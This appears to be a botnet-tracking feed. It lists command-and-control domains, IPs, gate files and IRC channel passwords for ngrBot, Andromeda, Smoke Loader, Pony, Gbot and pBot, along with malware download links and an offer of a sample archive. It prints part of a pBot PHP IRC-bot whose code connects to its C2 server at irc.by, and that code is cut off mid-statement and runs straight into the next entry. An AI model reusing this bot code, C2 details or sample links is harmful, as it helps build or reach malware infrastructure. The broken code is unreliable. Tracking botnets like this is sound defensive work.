Resolved mywebst0rage.info to 37.221.163.131
Server: mywebst0rage.info
Gate file: /admin/hippo/image.php
Hosting infos: http://whois.domaintools.com/37.221.163.131
208.117.34.145 (ngrBot hosted in United States Chicago Steadfast Networks)
Server: 208.117.34.145:1887
Server: 185.12.14.131:1887
Username: eyaimlr
Nickname: n{DE|XPa}eyaimlr
Channel: #bon2 (Password: speedd)
Channeltopic: :~pu hxxp://www.sendspace.com/pro/dl/ppbf96 26bc0e7256f2a7fb536bdd19e0464e49 ~s -o ~s
Download URLs: hxxp://69.31.136.17/dlpro/29c185ae59e68f635192223e650939a3/50fe994c/ppbf96/mariayonosy.exe (fs03n5.sendspace.com)
Hosting infos: http://whois.domaintools.com/208.117.34.145
voscomptesenligne.eu (Andromeda http botnet hosted by iws.co)
Resolved voscomptesenligne.eu to 91.223.82.179
Server: voscomptesenligne.eu
Gate file: /joomla/image.php
Plugins
Rootkit: http://voscomptesenligne.eu/joomla/r.pack
Formgrabber: http://voscomptesenligne.eu/joomla/f.pack
Gate file: /joomla/fg.php
http://whois.domaintools.com/91.223.82.179
105 MB samples
This package contains IRC bots, banking trojans, rootkits and other samples.
Only for analysis purposes.
imageshoster.ru (Smoke loader http botnet hosted by santrex.net)
Resolved imageshoster.ru to 46.166.169.187
Server: imageshoster.ru
Gate file: /pics/index.php
This is the new smokebot domain of the beerpigfarm.ru installs guy. His previous domain adzu324nbasmdaoias.su is currently hosted on the same server.
Sample: hxxp://46.166.177.120/smo
Hosting infos: http://whois.domaintools.com/46.166.169.187
fuelcw.org (Pony loader hosted by ihc.ru)
Resolved fuelcw.org to 37.143.9.173
Server: fuelcw.org
Gate file: /ios.php
http://whois.domaintools.com/37.143.9.173
ugctrust.com (Andromeda http botnet hosted by prohost.kg)
Resolved ugctrust.com to 91.213.233.156
Server: ugctrust.com
Gate file: /image.php
Sample was discovered by unixfreaxjp.
Hosting infos: http://whois.domaintools.com/91.213.233.156
kiz.no-ip.biz (Pony loader hosted by vmbox.co)
Resolved kiz.no-ip.biz to 94.242.238.213
Server: kiz.no-ip.biz
Gate file: /xen/ride/gate.php
Hosting infos: http://whois.domaintools.com/94.242.238.213
irc.by (Linux pBots hosted in Netherlands Netrc Llc)
Resolved: [irc.by] to [91.214.111.26]
Here is the pBot:
<!--
set_time_limit(0);
error_reporting(0);
class pBot {
 var config = array("server"=>"irc.by",
 "port"=>6669,
 "pass"=>"fx",
 "prefix"=>"fvox",
 "maxrand"=>8,
 "chan"=>"#webs",
 "key"=>"",
 "modes"=>"+iB-x",
 "password"=>"webs",
 "trigger"=>".",
 "hostauth"=>"Click.Here.To.Install.These.Updates" // * for any hostname
 );
 var users = array();
 function start() {
 if(!(this->conn = fsockopen(this->config['server'],this->config['port'],e,s,30)))
 this->start();
 ident = "";
 alph = range("a","z");
 for(i=0;i<this->config['maxrand'];i++)
 ident .=
othar.tk (Gbot http bot hosted by mchost.ru)
Resolved othar.tk to 178.208.80.88
Server: othar.tk
Gate file: //getcmd.php
Hosting infos: http://whois.domaintools.com/178.208.80.88